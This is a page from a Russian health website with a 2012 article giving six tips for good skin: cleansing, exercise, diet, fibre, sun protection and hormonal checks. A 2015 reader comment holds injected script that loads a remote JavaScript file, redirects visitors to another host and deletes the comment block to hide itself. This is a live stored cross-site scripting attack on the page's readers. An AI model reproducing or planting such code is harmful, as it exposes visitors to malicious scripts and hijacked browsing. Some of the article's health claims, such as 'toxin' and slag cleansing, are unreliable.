Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Шесть секретов красивой к...  >>  Шесть секретов красивой кожи
 
Обратная связь
 

Шесть секретов красивой кожи

Размер шрифта
17 мая 2012 10:00
  • google_analytics: false
  • Нравится

Далеко не все обладают сияющей, свежей и чистой кожей. Это настоящее сокровище не всем дано от природы. Как же добиться того, чтобы вашей кожей восхищались?

 

Есть несколько секретов, благодаря которым ваша кожа будет выглядеть прекрасно.

Очищение и питание

Очень важно не пренебрегать всеми этапами очищения и питания кожи. Чтобы там ни говорили наши мамы и бабушки, умывания с мылом недостаточно. Косметологи советуют умываться с помощью пенки, а потом протирать лицо тоником, который мгновенно уберет неприятное ощущение сухости. В конце обязательно нанесение крема. Таким образом всего за месяц можно заметно улучшить состояние кожи.

Физическая нагрузка

Для тонуса и красоты кожи порой достаточно коротенькой пробежки всего один раз в день. Секрет в том, что во время бега вибрация воздействует на все клетки организма, «встряхивая» их и активизируя обменные и восстановительные процессы.

Сбалансированное питание

Кожу можно назвать самым обширным органом нашего тела. И ее состояние отражает работу всех обменных процессов организма. Каждый день нам необходимы жиры, белки и углеводы в правильной пропорции. При этом жиры лучше выбирать растительные (оливковое масло, орехи, авокадо), а углеводы – сложные (бурый рис, гречка, зерновой хлеб). Что касается белков, растительных или животных, то это могут быть бобовые, орехи, куриное мясо и рыба, но главное, чтобы белка было достаточно, потому что именно он – главный строительный материал для обновления клеток.

К полноценному и разумному питанию нужно добавлять регулярный прием витаминов и пищевых добавок. Для женской красоты особенно важны витамины А и Е, а также жиры, содержащиеся в рыбьем жире, орехах, льняном и оливковом масле.

Клетчатка

Это балластное вещество, которое организмом в принципе не переваривается. Его роль в целом ряде пищеварительных процессов необыкновенно важна. В частности, клетчатка проходит через весь пищеварительный тракт, очищая ворсинки на его поверхности на манер зубной щетки. Также клетчатка абсорбирует токсичные вещества, препятствуя их всасыванию; замедляет усвоение быстрых углеводов и создает ощущение сытости, предотвращая переедание. В результате пищеварительный тракт работает идеально, снабжая все наши органы питательными веществами и своевременно избавляясь от шлаков и токсинов.

Клетчатка содержится в свежих фруктах и овощах, бобовых и зерновых растениях.

Защита от солнца

Загар невероятно сильно сушит кожу и ускоряет старение. Поэтому обязательно пользуйтесь кремами с защитой и избегайте палящего солнца.

Гормональный фон

Если все вышеупомянутые методы не дают желаемого результата, то это серьезный повод задуматься. Возможно, причина плохого состояния вашей кожи лежит в гормональной сфере. Чтобы выяснить это наверняка, нужно посетить гинеколога-эндокринолога и сдать необходимые анализы.

Врач-гинеколог поможет подобрать контрацептивы, прием которых обычно рекомендуют косметологи при проблемах с кожей, например с акне.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему у вас сохнут губы   Новогодние подарки для вашей кожи   Вы чешетесь из-за вашего дома   Почему если почесать, то снова чешется?  
28 декабря 2012Дед Мороз – красный нос: не от холода, а от бактерий 11 сентября 2012Солнечные ожоги снижают риск рака кожи!
 
16 февраля 2012Умная повязка для ран 13 февраля 2012Солнце провоцирует гиперпигментацию
 

Слайдшоу

1
Что есть зимой для кожи
Вы неправильно моете лицо! Как надо?
Как сделать руки моложе

Тесты

1
Как выявить контактный дерматит?
Мифы о прыщах
Профессиональный оценщик кожи
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.